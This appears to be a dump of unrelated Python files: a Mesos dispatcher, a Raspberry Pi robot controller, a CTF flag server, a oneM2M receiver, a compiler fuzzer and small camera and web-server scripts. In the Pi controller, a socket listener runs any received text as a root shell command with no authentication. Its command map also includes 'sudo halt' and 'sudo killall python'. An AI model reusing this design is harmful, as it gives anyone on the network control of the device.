self.cancelJob(jobId, driver)
if update.state == mesos_pb2.TASK_FINISHED:
self.taskFinished(update.task_id.value)
def killStragglers(self, curr_ts, driver):
expired_jobs = []
for (job_id, job) in self.active.items():
if job.time_limit != 0 and (curr_ts - job.start_ts) >= job.time_limit:
logging.info("[DISPATCHER] Cancelling Job %s. Time limit of %d seconds exceeded" % (job_id, job.time_limit))
expired_jobs.append(job_id)
for job_id in expired_jobs:
self.cancelJob(job_id, driver)
def frameworkMessage(self, driver, executorId, slaveId, message):
logging.info("[FRMWK MSG] %s" % message[:-1])
# Handle a resource offers from Mesos.
# If there is a pending job, add all offers to self.offers
# Then see if pending jobs can be launched with the offers accumulated so far
def resourceOffers(self, driver, offers):
heartBeat.set()
# logging.info("[DISPATCHER] Got %d resource offers. %d jobs in the queue" % (len(offers), len(self.pending)))
ts = time.time()
self.killStragglers(ts, driver)
# Heart Beat logging
# if ts > self.idle:
logging.info("[DISPATCHER] HeartBeatting with Mesos. # Offers: %d", len(offers))
# self.idle = ts + heartbeat_delay
# Crude Garbage Collection to police up jobs in bad state
if ts > self.gc:
pendingJobs = [j.jobId for j in self.pending]
for job in db.getJobs():
if job['jobId'] in pendingJobs or job['jobId'] in self.active or JobStatus.done(job['status']):
continue
else:
logging.info("[GARBAGE COLLECTION] Job `%(jobId)s` is listed as %(status)s, \
but is neither pending nor active. Killing it now." % job)
db.updateJob(job['jobId'], status=JobStatus.KILLED, done=True)
self.gc = ts + gc_delay
if len(self.pending) == 0:
self.offerRelease = ts + offer_wait
for offer in offers:
driver.declineOffer(offer.id)
# logging.debug("DECLINING Offer from %s" % offer.hostname)
return
for offer in offers:
self.offers[offer.id.value] = offer
logging.debug ("OFFER ID =====>>> " + offer.id.value)
nextJob = self.prepareNextJob()
if nextJob != None:
self.launchJob(nextJob, driver)
else:
if len(self.pending) > 0:
logging.info("[DISPATCHER] Not enough resources to launch next job")
if ts > self.offerRelease + offer_wait:
logging.info("[DISPATCHER] I've waited %s seconds and cannot lauch. Releasing all offers", offer_wait)
for offer in offers:
driver.declineOffer(offer.id)
del self.offers[offer.id.value]
self.offerRelease = ts + offer_wait
else:
def clearOffers():
logging.debug("[DISPATCHER] I'm waiting for a heartbeat in case there are no offers.")
heartbeat = heartBeat.wait(float(offer_wait))
if not heartbeat:
logging.info("[DISPATCHER] Heartbeat Timeout holding offers (NO OFFERS). I've waited %s seconds and cannot lauch. Releasing all offers", offer_wait)
for offer in offers:
driver.declineOffer(offer.id)
del self.offers[offer.id.value]
self.offerRelease = ts + offer_wait
else:
logging.debug("[DISPATCHER] Heartbeat was alive. No need to clear offers.")
heartBeat.clear()
logging.info("[DISPATCHER] Insufficient Offers, I will wait a bit for more offers")
nulloffer = Thread(target=clearOffers)
nulloffer.start()
logging.info("[DISPATCHER] HOLDING %d Offers for %s Jobs and waiting for more offers", len(self.offers), len(self.pending))
def offerRescinded(self, driver, offer):
logging.warning("[DISPATCHER] Previous offer '%s' invalidated", str(offer.value))
if offer.value in self.offers:
del self.offers[offer.value]
def kill(self, driver):
for jobId in self.active.keys() + self.pending.keys():
logging.warning("[DISPATCHER] KILLING job, %s" % jobId)
self.cancelJob(jobId, driver)
self.terminate = True
logging.info("[DISPATCHER] Terminating")
|
wsgi.py
|
"""
WSGI config for ControlServer project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
# import asyncio
# import threading
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ControlServer.settings')
application = get_wsgi_application()
# thread_loop = asyncio.new_event_loop()
#
#
# def start_loop(loop):
# asyncio.set_event_loop(loop)
# loop.run_forever()
#
#
# t = threading.Thread(target=start_loop, args=(thread_loop,), daemon=True)
# t.start()
|
start.py
|
#! /usr/bin/env python
import subprocess
from nodes import Console
import threading
import time
import socket
# Copilot.
copilot = Console("192.168.1.11", 11000)
# Connection verification thread method.
def piconn():
try:
while True:
copilot.send("status,Raspberry connected")
time.sleep(5)
except:
raise
return
# Declare the thread.
#rpiConn = threading.Thread(target=piconn)
# Start the thread.
#rpiConn.start()
lcam = subprocess.Popen('mjpg_streamer -b -i "/usr/local/lib/input_uvc.so -f 25 -d /dev/video0 -r 1280*720" -o "/usr/local/lib/output_http.so -w /usr/local/www -p 8080"', shell=True)
rcam = subprocess.Popen('mjpg_streamer -b -i "/usr/local/lib/input_uvc.so -f 25 -d /dev/video1 -r 1280*720" -o "/usr/local/lib/output_http.so -w /usr/local/www -p 8081"', shell=True)
#time.sleep(5)
rard = subprocess.Popen(['sudo', 'python', '/home/pi/main.py', '0', '&'], shell=False)
#time.sleep(5)
lard = subprocess.Popen(['sudo', 'python', '/home/pi/main.py', '1', '&'], shell=False)
#time.sleep(5)
serv = subprocess.Popen(['sudo', 'python', '/home/pi/servo.py', '&'], shell=False)
# Request dictionary that map the symbol received to the corresponding shell signal.
req = {
"mS" : "sudo python /home/pi/main.py &",
"mT" : "sudo pkill -f main.py",
"mR" : "sudo kill " + str(rard.pid) + " & sudo python /home/pi/control_files/main.py &",
"m2S" : "sudo python /home/pi/main2.py",
"m2T" : "sudo pkill -f main2.py",
"m2R" : "sudo kill " + str(lard.pid) + " & sudo python /home/pi/main2.py & ",
"sS" : "sudo python /home/pi/servo2.py",
"sT" : "sudo pkill -f servo2.py",
"sR" : "sudo kill " + str(serv.pid) + " & sudo python /home/pi/servo2.py & ",
"rcS" : 'sudo mjpg_streamer -b -i "/usr/local/lib/input_uvc.so -f 25 -d /dev/video0 -r 1280*720" -o "/usr/local/lib/output_http.so -w /usr/local/www -p 8080"',
"rcT" : 'sudo kill ' + str(rcam.pid),
"rcR" : 'sudo kill ' + str(rcam.pid) + ' & sudo mjpg_streamer -b -i "/usr/local/lib/input_uvc.so -f 25 -d /dev/video0 -r 1280*720" -o "/usr/local/lib/output_http.so -w /usr/local/www -p 8080" &',
"lcS" : 'sudo mjpg_streamer -b -i "/usr/local/lib/input_uvc.so -f 25 -d /dev/video1 -r 1280*720" -o "/usr/local/lib/output_http.so -w /usr/local/www -p 8081"',
"lcT" : 'sudo kill ' + str(lcam.pid),
"lcR" : 'sudo kill ' + str(lcam.pid) + ' & sudo mjpg_streamer -b -i "/usr/local/lib/input_uvc.so -f 25 -d /dev/video1 -r 1280*720" -o "/usr/local/lib/output_http.so -w /usr/local/www -p 8081" &',
"KAP" : "sudo killall python",
"KAC" : "sudo killall mjpg_streamer",
"SA" : "sudo /home/pi/./start.py",
"SD" : "sudo halt",
"KA" : "sudo killall python & sudo killall mjpg_streamer"
}
host = '192.168.1.6'
port = 8001
srv = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
conn =socket.socket()
srv.bind((host,port))
try:
while True:
print "Listenning .."
try:
srv.listen(1)
except Exception as e:
print "Error listening (Line) :", e.message
try:
conn , addr = srv.accept() #connection - blocking call
except Exception as e:
print "Error accepting TCP connection (Line ) :", e.message
try:
msg = conn.recv(1024) # Normally 1024, 20 fast response
except Exception as e:
print "Error receiving TCP package (Line ) :", e.message
msg = msg.strip("\n")
msglen = len(msg)
if(msglen<=3):
ret = subprocess.Popen(req[msg].split(),shell=False)
print req[msg].split()
if msg == "mS": rard = ret.pid
elif msg == "m2S": lard = ret.pid
elif msg == "sS": serv = ret.pid
# print req[msg]
else:
ret = subprocess.Popen(msg,shell=True)
# print msg
conn.close()
except KeyboardInterrupt as e:
print "Keyboard Interrupt at Start.py"
except Exception as e:
print "Problem in start.py :", e.message
|
serve.py
|
import multiprocessing
import socket
from typing import Tuple
import flags_and_teams
import random
def get_task() -> Tuple[str, str]:
n1 = random.randint(-10, 10)
n2 = random.randint(-10, 10)
p = random.choice(["+", "-", "*"])
s = f"{n1} {p} {n2}"
return (s, str(int(eval(s))))
import logging
def init_logger(logger):
logger.setLevel(logging.DEBUG)
log_formatter = logging.Formatter("[%(asctime)s] [%(name)8s:%(process)-6.6s] [%(levelname)-5.5s] --- %(message)s")
file_handler = logging.FileHandler("./latest.log")
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(log_formatter)
logger.addHandler(file_handler)
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.INFO)
console_handler.setFormatter(log_formatter)
logger.addHandler(console_handler)
def handle(connection: socket.socket, address):
try:
logger = logging.getLogger("handler")
init_logger(logger)
logger.info("Connected at %r", address)
flag = "Something unexpected happened. If you see this message, please contact us"
connection.sendall("Hello stranger, i don't identify you. Maybe you introduce yourself? ".encode())
while True:
data = connection.recv(1024)
if data == "":
logger.debug("Socket closed remotely")
break
team = data.decode('UTF-8') #type: str
team = team.strip()
flag = flags_and_teams.data.get(team, None)
if flag:
break
else:
connection.sendall("I still can't identify you. mb try again? ".encode())
connection.sendall("Ok. Here is you task:\n".encode())
for i in range(100):
eq = get_task()
logger.debug("Made problem: %s", eq)
connection.sendall("What is ".encode())
connection.sendall(eq[0].encode())
connection.sendall("\n".encode())
data = None
try:
connection.settimeout(1)
data = connection.recv(1024)
connection.settimeout(10)
except:
pass
logger.debug("Received data %r", data)
if not data:
logger.debug("Timeout".encode())
logger.info(f"{team}{address} timeout")
connection.sendall("Time is up!\n".encode())
connection.shutdown(socket.SHUT_RDWR)
break
if eq[1] == data.decode().strip():
connection.sendall("Correct\n".encode())
logger.debug("Correct")
else:
logger.debug("Incorrect")
logger.info(f"{team}{address} incorrect")
connection.sendall("Incorrect\n".encode())
connection.shutdown(socket.SHUT_RDWR)
break
else:
logger.warning(f"Team {team}{address} solved!")
connection.sendall("Congratulations! Your flag is {0} \n".format(flag).encode())
except:
logger.exception("Problem handling request")
connection.sendall(("Something wrong happent. If you see this, please contact admins with this timestamp: " + \
datetime.now().strftime("%D %X:%f")).encode())
finally:
logger.debug("Closing socket")
connection.shutdown(socket.SHUT_RDWR)
connection.close()
class Server(object):
def __init__(self, hostname, port):
self.logger = logging.getLogger("server")
init_logger(self.logger)
self.hostname = hostname
self.port = port
def start(self):
self.logger.debug("listening")
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind((self.hostname, self.port))
self.socket.listen(1)
while True:
conn, address = self.socket.accept()
self.logger.debug("Got connection")
process = multiprocessing.Process(target=handle, args=(conn, address))
process.daemon = True
process.start()
self.logger.debug("Started process %r", process)
if __name__ == "__main__":
logger = logging.getLogger("main")
init_logger(logger)
import sys
port = int(sys.argv[1])
server = Server("0.0.0.0", port)
try:
logger.info("Listening")
server.start()
except:
logger.exception("Unexpected exception")
finally:
logger.info("Shutting down")
for process in multiprocessing.active_children():
logger.info("Shutting down process %r", process)
process.terminate()
process.join()
logger.info("All done")
|
RHUBModbus.py
|
#!/usr/bin/env python
#
# Example RenewablesHUB Modbus service receiver.
#
# Pre-requisites:
#
# # apt install python-is-python3 python3-pip python3-virtualenv
# # pip3 install aiohttp==3.7.4.post0 pytz requests Sphinx sphinx_rtd_theme
# # mkdir -m 775 /var/log/rhubmodbus
import os, sys, signal, threading, queue, socket, requests, json, pytz, configparser
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from client.onem2m.OneM2MPrimitive import OneM2MPrimitive
from client.onem2m.http.OneM2MRequest import OneM2MRequest
from client.onem2m.resource.Container import Container
from client.onem2m.resource.ContentInstance import ContentInstance
from client.cse.CSE import CSE
from client.ae.AE import AE
from client.ae.AsyncResponseListener import AsyncResponseListenerFactory
from client.Utility import Utility
from threading import Lock
from datetime import datetime
from typing import Final
from aiohttp import web
################# Configure the following for your environment #################
# The AE App and credential IDs, as generated in PolicyNet via More -> System settings -> AE Registration Credentials.
APP_ID: Final = 'Nrhubmodbus'
AE_ID: Final = 'XXXXXXXXXXXXXXXX'
# Address of the IN-CSE running in your cloud environment.
CSE_PROTOCOL: Final = 'http'
CSE_HOST: Final = 'dev9.usw1.aws.corp.grid-net.com'
CSE_PORT: Final = 21300
# Identification of this IN-AE.
RESOURCE_NAME: Final = APP_ID[1:]
APP_NAME: Final = 'com.grid-net.' + RESOURCE_NAME
# Timezone for log rotation. A new log file is started at midnight in this timezone.
tz = pytz.timezone('Australia/Sydney')
############################## End of site config ##############################
# MN-AE configuration container and content instance: in this example, the report interval, in seconds.
SEND_CONFIG: Final = False
CONFIG_CONTAINER: Final = 'rhubModbus'
CONFIG_RESOURCE_NAME: Final = 'reportInterval'
CONFIG_CONTENT: Final = 3600
# Details of the (usually local) listener that the IN-CSE will send notifications to.
NOTIFICATION_PROTOCOL: Final = 'http'
NOTIFICATION_HOST: Final = Utility.myIpAddress()
NOTIFICATION_PORT: Final = 8081
NOTIFICATION_CONTAINER: Final = 'cnt-00001'
NOTIFICATION_SUBSCRIPTION: Final = 'sub-00001'
NOTIFICATION_CONTAINER_MAX_AGE: Final = 900
NOTIFICATION_LOG_DIR: Final = '/var/log/rhubmodbus'
NOTIFICATION_LOG_PREFIX: Final = 'notification_log_'
NOTIFICATION_LOG_SUFFIX: Final = '.json'
SETTINGS_FILE: Final = '/var/tmp/rhubmodbus.ini'
# Create an instance of the CSE to send requests to.
pn_cse = CSE(CSE_HOST, CSE_PORT)
# Persistent settings via INI file.
settings = configparser.ConfigParser()
# Queue used to control the configWorker thread.
configQueue = queue.Queue()
# Mutex to enforce atomicity on log file writes.
logMutex = Lock()
# Thread to asynchronously send configuration commands to MN-AEs that report in.
def configWorker():
while True:
config_path = configQueue.get()
print('Creating configuration content instance {}'.format(config_path))
content = ContentInstance({'rn': CONFIG_RESOURCE_NAME, 'con': CONFIG_CONTENT})
assert pn_cse.ae is not None
to = '{}://{}:{}{}'.format(CSE_PROTOCOL, CSE_HOST, CSE_PORT, config_path)
params = {
OneM2MPrimitive.M2M_PARAM_FROM: pn_cse.ae.ri,
OneM2MPrimitive.M2M_PARAM_RESULT_CONTENT: 2,
OneM2MPrimitive.M2M_PARAM_RESOURCE_TYPE: OneM2MPrimitive.M2M_RESOURCE_TYPES.ContentInstance.value,
}
content_instance = content
oneM2MRequest = OneM2MRequest()
try:
response = oneM2MRequest.create(to, params, content_instance)
response.dump('Configuration Content Instance')
except requests.exceptions.HTTPError as e:
print("Error: Configuration content instance creation failed with error {}".format(e.response.status_code))
configQueue.task_done()
def saveConfig(ri):
settings.set('DEFAULT', 'ri_persistent', ri)
with open(SETTINGS_FILE, 'w') as inifile:
settings.write(inifile)
# Term signal handler to perform deregistration at shutdown.
def handleSignalTerm(signal, frame):
if pn_cse.ae is not None:
del_res = pn_cse.delete_ae()
del_res.dump('Delete AE')
saveConfig('')
sys.exit(0)
def main():
try:
signal.signal(signal.SIGTERM, handleSignalTerm)
sys.stdout.reconfigure(line_buffering=True, encoding="utf-8")
# Confirm that there isn't already an instance running, using the HTTP listening port as a lock.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
try:
bindres = sock.bind(('', NOTIFICATION_PORT))
if bindres is not None and bindres != 0:
print('Error binding to port {}: {}'.format(NOTIFICATION_PORT, os.strerror(bindres)))
sys.exit(-1)
except socket.error as msg:
print('Error binding to port {}: {}'.format(NOTIFICATION_PORT, msg))
sys.exit(-1)
sock.close()
# Open persistent setting file, or create if it doesn't exist.
if settings.read(SETTINGS_FILE) == []:
with open(SETTINGS_FILE, 'w') as fp:
print('[DEFAULT]\nri_persistent = ', file=fp)
fp.close()
settings.read(SETTINGS_FILE)
# If we did not cleanly exit last time, clean up the previous registration before continuing.
ri_persistent = settings.get('DEFAULT', 'ri_persistent')
if ri_persistent is not None and ri_persistent != '' and ri_persistent != "":
print('Deregistering AE "{}" with CSE @ {}'.format(ri_persistent, CSE_HOST))
to_ae = '{}://{}:{}/PN_CSE/{}'.format(pn_cse.transport_protocol, pn_cse.host, pn_cse.port, ri_persistent)
res = pn_cse.delete_ae(to_ae, ri_persistent)
res.dump('Deregister AE')
saveConfig('')
# Create an AE instance to register with the CSE.
NOTIFICATION_URI: Final = '{}://{}:{}'.format(NOTIFICATION_PROTOCOL, NOTIFICATION_HOST, NOTIFICATION_PORT)
req_ae = AE(
{
AE.M2M_ATTR_APP_ID : APP_ID,
AE.M2M_ATTR_APP_NAME : APP_NAME,
AE.M2M_ATTR_AE_ID : AE_ID,
AE.M2M_ATTR_POINT_OF_ACCESS: [NOTIFICATION_URI],
}
)
# Start the configuration worker thread.
threading.Thread(target=configWorker, daemon=True).start()
print('Registering AE "{}" with CSE @ {}'.format(req_ae.aei, CSE_HOST))
# Register with the specified resourceName (or, if it is None, let the IN-CSE allocate one).
res = pn_cse.register_ae(req_ae, RESOURCE_NAME)
res.dump('Register AE')
if res.rsc != OneM2MPrimitive.M2M_RSC_CREATED:
print('Could not register AE\nExiting...')
sys.exit(-2)
# Save the name and RI we registered as.
rn = res.pc["m2m:ae"]["rn"]
saveConfig(res.pc["m2m:ae"]["ri"])
print('AE registration successful: {}'.format(rn))
# Example: Discover registered nodes.
# print('Discovering nodes:')
# containers = pn_cse.discover_nodes()
# containers.dump('Discover Nodes')
# print('Retrieved {} nodes\n'.format(len(containers.pc["m2m:uril"])))
# Create a new container.
print('Creating container {}/{}'.format(rn, NOTIFICATION_CONTAINER))
content = Container({'rn': NOTIFICATION_CONTAINER, 'mia': NOTIFICATION_CONTAINER_MAX_AGE})
res = pn_cse.create_resource(rn, None, content, OneM2MRequest.M2M_RCN_HIERARCHICAL_ADDRESS)
res.dump('Create Container')
# Create a subscription to the container.
print('Subscribing to container: {}/{}'.format(rn, NOTIFICATION_CONTAINER))
sub_res = pn_cse.create_subscription(rn + '/' + NOTIFICATION_CONTAINER, NOTIFICATION_SUBSCRIPTION, NOTIFICATION_URI, [3],
OneM2MRequest.M2M_RCN_HIERARCHICAL_ADDRESS)
sub_res.dump('Create Subscription')
# Get the request ID to register with the async response handler.
# NOTE The key we actually need isn't the RI, but rather the subscription URI.
request_id = sub_res.pc["m2m:uri"]
# Example: Retrieve the latest content instance.
# print('Listing content instances in container: {}'.format(rn))
# instance = pn_cse.retrieve_content_instance(rn)
# instance.dump('Instance')
# Example: Create a content instance.
# print('Creating content instance of resource {}'.format("foobar"))
# content = ContentInstance({'con': 'default content'})
# res = pn_cse.create_content_instance("foobar", content)
# res.dump('Create Content Instance')
# Callback that will be execute whenever an HTTP request is sent to localhost:8081
# and X-M2M-RI header is set. The handler functions should process the request and
# return the appropriate HTTP response orginator.
# @todo AsyncResponseListener needs further refinement. It should work with OneM2M primitives, not
# HTTP messages directly.
# Params are aiohttp request and response instance.
# https://docs.aiohttp.org/en/stable/web_reference.html?highlight=Request#request-and-base-request
# https://docs.aiohttp.org/en/stable/web_reference.html?highlight=Response#response-classes
async def request_handler(req: web.Request, res: web.Response):
# Process request.
if req.method == 'POST' or req.body_exists():
# Modify response.
res.headers.popall('Content-Type', "")
res.headers['X-M2M-RSC'] = '2000'
res.headers['X-M2M-RI'] = req.headers.get('X-M2M-RI')
# Print and log the JSON.
body = await req.json()
if body is not None:
# Create a new log file every day, starting at 00:00:00 in the local timezone.
day_now = datetime.now(tz).strftime('%Y-%m-%d')
logFileName = NOTIFICATION_LOG_DIR + '/' + NOTIFICATION_LOG_PREFIX + day_now + NOTIFICATION_LOG_SUFFIX
with logMutex:
logFile = open(logFileName, 'a')
logFile.write('{}\n'.format(body)) # Newline-terminated, i.e. NDJSON
logFile.close()
# Parse the content into its own object, as it may be sent with double quotes instead of single.
con = json.loads(body['m2m:sgn']['nev']['rep']['m2m:cin']['con'])
duration = con['te'] - con['ts']
# If the MN-AE if it is reporting too frequently or infrequently, reconfigure it.
if SEND_CONFIG and (duration < 0.9 * CONFIG_CONTENT or duration > 1.1 * CONFIG_CONTENT):
cr = body['m2m:sgn']['nev']['rep']['m2m:cin']['cr']
if (cr is not None):
path = '/~/{}/{}'.format(cr, CONFIG_CONTAINER)
configQueue.put(path)
return res
print('IN-AE started')
handlerFactory = (
AsyncResponseListenerFactory(NOTIFICATION_HOST, NOTIFICATION_PORT)
)
handler = handlerFactory.get_instance()
handler.set_rqi_cb(
request_id, request_handler
) # Map request ID to corresponding handler function.
handler.run()
except Exception as err:
print('Exception raised...\n')
print(err)
if err.response is not None and err.response.text is not None:
print(err.response.text)
finally:
print('Cleaning up...')
# Clean up AE.
if pn_cse.ae is not None:
del_res = pn_cse.delete_ae()
del_res.dump('Delete AE')
saveConfig('')
if __name__ == '__main__':
main()
|
fuzzer.py
|
#!/usr/bin/env python3
import random
import subprocess
import os
import re
from sys import argv
import threading
# number of terms to generate
TERM_NUM = 50
PATH_TO_C4 = os.path.join("..","build","debug", "c4")
EXECUTION_COMMAND = PATH_TO_C4 + " --parse {}"
FILTER_FUNC_RETURN = True
FILTER_VOID_FIELD = True
ONLY_NEGATIVE = False
NO_SEGMANTION_FAULT = False
NO_ASSERTION = False
NO_STRUCT = True
NO_KEYWORDS = True
KEYWORD_FILTER = ["auto", "break", "case", "default", "do", "double", "else", "enum", "float", "for", "goto", "if", "inline"
"long", "register", "restrict", "return", "short", "signed", "sizeof", "static", "switch", "typedef", "union",
"unsigned", "volitale", "while", "_Alignas", "_Alignof", "_Atomic", "_Bool", "_Complex", "_Generic", "_Imaginary",
"_Noreturn", "_Static_assert", "_Thread_local"]
ident_reg = re.compile("[A-Za-z_]")
num_reg = re.compile("-n ([0-9]+)")
term_colours = True
print_lock = threading.Lock()
START_SYMBOL = "$START"
MAX_SYMBOLS = 20
MAX_TRIES = 100000
grammar = {
"$START" : ["$TOP-DECLARATION"],
"$TOP-DECLARATION" : ["$DECLARATION-SPECIFIERS;", "$DECLARATION-SPECIFIERS $DECLARATOR;"],
"$DECLARATOR" : ["$POINTER$DIRECT-DECLARATOR", "$DIRECT-DECLARATOR"],
"$DIRECT-DECLARATOR" : ["$IDENTIFIER", "($DECLARATOR)",
"$DIRECT-DECLARATOR ($PARAM-TYPE-LIST)"],
"$POINTER" : ["*", "*$POINTER"],
"$PARAM-TYPE-LIST" : ["$PARAM-LIST"],
"$PARAM-LIST" : ["$PARAM-DECLARATION", "$PARAM-LIST, $PARAM-DECLARATION"],
"$PARAM-DECLARATION" : ["$DECLARATION-SPECIFIERS $DECLARATOR",
"$DECLARATION-SPECIFIERS",
"$DECLARATION-SPECIFIERS $ABSTRACT-DECLARATOR"],
"$IDENTIFIER" : ["$IDENT-NONDIGIT", "$IDENTIFIER$IDENT-NONDIGIT",
"$IDENTIFIER$DIGIT"],
"$IDENT-NONDIGIT" : [a for a in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_"],
"$DIGIT" : [a for a in "0123456789"],
"$DECLARATION-SPECIFIERS" : ["$TYPE-SPECIFIER"],
"$TYPE-SPECIFIER" : ["void", "char", "int"] + (["$STRUCT"] if "--struct" in argv else []),
"$STRUCT" : ["struct $IDENTIFIER", "struct $IDENTIFIER {$STR-DECL-LIST}"],
"$STR-DECL-LIST" : ["$STRU-DECL", "$STR-DECL-LIST $STRU-DECL"],
"$STRU-DECL" : ["$TYPE-SPECIFIER;", "$TYPE-SPECIFIER $ST-DECLARATOR-LIST;"],
"$ST-DECLARATOR-LIST" : ["$S-DECLARATOR", "$ST-DECLARATOR-LIST, $S-DECLARATOR"],
"$S-DECLARATOR" : ["$DECLARATOR"],
"$ABSTRACT-DECLARATOR" : ["$POINTER", "$POINTER$DIRECT-ABS-DECLARATOR", "$DIRECT-ABS-DECLARATOR"],
"$DIRECT-ABS-DECLARATOR" : ["($ABSTRACT-DECLARATOR)", "$DIRECT-ABS-DECLARATOR ($PARAM-TYPE-LIST)",
"()", "$DIRECT-ABS-DECLARATOR()", "($PARAM-TYPE-LIST)"]
}
class colour():
def __init__(self):
self.green = "\033[92m"
self.red = "\033[91m"
self.yellow = "\033[93m"
self.default = "\033[0m"
def enable(self):
self.__init__()
def disable(self):
self.green = ""
self.red = ""
self.yellow = ""
self.default = ""
c = colour()
def apply_subst(term, rule):
old, new = rule
return term.replace(old, new, 1)
def create_term(grammar):
term = START_SYMBOL
tries = 0
while term.count("$") > 0:
to_subst = random.choice(list(grammar.keys()))
subst = random.choice(grammar[to_subst])
new_term = apply_subst(term, (to_subst, subst))
if term != new_term and term.count("$") < MAX_SYMBOLS:
term = new_term
tries = 0
else:
tries += 1
if tries > MAX_TRIES:
raise RuntimeError
return term
def term_filter(term):
reduced_term = term.replace("int", "").replace("void", "").replace("char", "")
return bool(ident_reg.search(reduced_term))
def output_filter(output):
if FILTER_FUNC_RETURN and "Function may not return another function!" in output:
return False
if FILTER_VOID_FIELD and "variable or field declared void" in output:
return False
if NO_SEGMANTION_FAULT and "Segmentation" in output:
return False
if NO_ASSERTION and "Assertion" in output:
return False
if NO_KEYWORDS:
for keyword in KEYWORD_FILTER:
if "\"{}\"".format(keyword) in output:
return False
return True
def test_term(id):
work = True
term = str()
while work:
try:
term = create_term(grammar)
except RuntimeError:
continue
if not term_filter(term):
continue
path_to_content = os.path.join(".", "cnt{}.tmp".format(id))
with open(path_to_content, "w") as cnt:
cnt.write(term)
process = subprocess.Popen(EXECUTION_COMMAND.format(path_to_content), stderr=subprocess.PIPE, shell=True)
output, err = process.communicate()
err = err.decode("utf8")
exit_code = process.wait()
if ONLY_NEGATIVE and exit_code == 0:
continue
if not output_filter(err):
continue
print_lock.acquire()
try:
print("{}: {}".format(c.green + "SUCCESS" + c.default if exit_code==0 else c.red + "FAILURE" + c.default, term))
if err:
print(c.yellow + "ERROR MESSAGE:" + c.default +" {}".format(err))
finally:
print_lock.release()
try:
os.remove(path_to_content)
os.remove(path_to_content[:-3] + "ll")
except:
pass
break
if __name__ == "__main__":
# disables colours
if "--no-colour" in argv:
c.disable()
# enables structs
if "--struct" in argv:
NO_STRUCTS = False
# enables report for errors for function return types
if "--func-return" in argv:
FILTER_FUNC_RETURN = False
# enables report for void field errors
if "--void-field" in argv:
FILTER_VOID_FIELD = False
# disables report for segmentation faults
if "--no-seg" in argv:
NO_SEGMANTION_FAULT = True
# disables report for assertion fails
if "--no-assert" in argv:
NO_ASSERTION = True
# only shows failed test cases
if "--only-neg" in argv:
ONLY_NEGATIVE = True
# disables filtering of keywords
if "--keywords" in argv:
NO_KEYWORDS = False
# -n for number of finished tests
for i in range(len(argv)):
if argv[i] == "-n" and i+1 < len(argv):
if argv[i + 1].isdecimal():
TERM_NUM = int(argv[i+1])
threads = list()
for i in range(TERM_NUM):
threads.append(threading.Thread(target=test_term, args=[i]))
threads[i].start()
for thread in threads:
thread.join()
|
camera_in_frame.py
|
from PIL import Image
from PIL import ImageTk
import mediapipe as mp
import numpy as np
import tkinter as tk
import threading
import datetime
import cv2
import os
def camcam():
def camThread():
color = []
cap = cv2.VideoCapture(0)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640) #캠크기 조절
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)
panel = None
if (cap.isOpened() == False):
print("Unable to read camera feed")
while True:
ret, color = cap.read()
if (color != []):
image = cv2.cvtColor(color, cv2.COLOR_BGR2RGB)
image = Image.fromarray(image)
image = ImageTk.PhotoImage(image)
if panel is None:
panel = tk.Label(image=image)
panel.image = image
panel.pack(side="left")
else:
panel.configure(image=image)
panel.image = image
cv2.waitKey(1)
if __name__ == '__main__':
thread_img = threading.Thread(target=camThread, args=())
thread_img.daemon = True
thread_img.start()
root = tk.Tk()
root.title("Hand Figuration")
root.geometry('1920x1080')
root.minsize(1768,992)
root.maxsize(2560,1440)
root.mainloop()
camcam()
|
process_example.py
|
from multiprocessing import Process
def print_func(continent='Asia'):
print('The name of continent is : ', continent)
if __name__ == "__main__": # confirms that the code is under main function
names = ['America', 'Europe', 'Africa']
procs = []
proc = Process(target=print_func) # instantiating without any argument
procs.append(proc)
proc.start()
# instantiating process with arguments
for name in names:
# print(name)
proc = Process(target=print_func, args=(name,))
procs.append(proc)
proc.start()
# complete the processes
for proc in procs:
proc.join()
|
webserver.py
|
import threading
import logging
from bottle import route, view, static_file, run, ServerAdapter, request, response
import settings
def start_server(pipe, cam_comm):
setup(cam_comm)
t = start_stopper_listener(pipe)
logging.info("Starting web server...")
start_listening()
logging.info("Web server stopped!")
t.join()
logging.info("Server terminated.")
def start_listening():
run(server=server)
def start_stopper_listener(pipe):
t = threading.Thread(target=_stopper_listener, args=(pipe,), name="Webserver Stopper Listener")
t.start()
return t
def _stopper_listener(pipe):
while True:
msg = pipe.recv()
if isinstance(msg, str) and msg == "terminate":
logging.info("Received terminate command - stopping")
server.stop()
break
def setup(cam_comm):
@route("/")
@view("main")
def main():
return {
"isRecording": cam_comm.is_recording(),
"segmentLengthSeconds": settings.RECORDINGS_FRAMES_PER_FILE / settings.CAMERA_FPS
}
@route("/segment")
def segment():
last_received = request.get_header("X-last-received-segment")
(filename, segment) = cam_comm.segment(last_received)
response.set_header("X-segment-name", filename)
return segment
@route("/recording/start")
def start_recording():
cam_comm.start_recording()
@route("/recording/stop")
def stop_recording():
cam_comm.stop_recording()
@route("/static/<name>")
def static(name):
return static_file(name, root="./static")
class MyWSGIRefServer(ServerAdapter):
def run(self, app): # pragma: no cover
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
from wsgiref.simple_server import make_server
import socket
class FixedHandler(WSGIRequestHandler):
def address_string(self): # Prevent reverse DNS lookups please.
return self.client_address[0]
def log_request(*args, **kw):
if not self.quiet:
return WSGIRequestHandler.log_request(*args, **kw)
handler_cls = self.options.get('handler_class', FixedHandler)
server_cls = self.options.get('server_class', WSGIServer)
if ':' in self.host: # Fix wsgiref for IPv6 addresses.
if getattr(server_cls, 'address_family') == socket.AF_INET:
class server_cls(server_cls):
address_family = socket.AF_INET6
self.server = make_server(self.host, self.port, app, server_cls, handler_cls)
self.server.serve_forever()
def stop(self):
# self.server.server_close() <--- alternative but causes bad fd exception
self.server.shutdown()
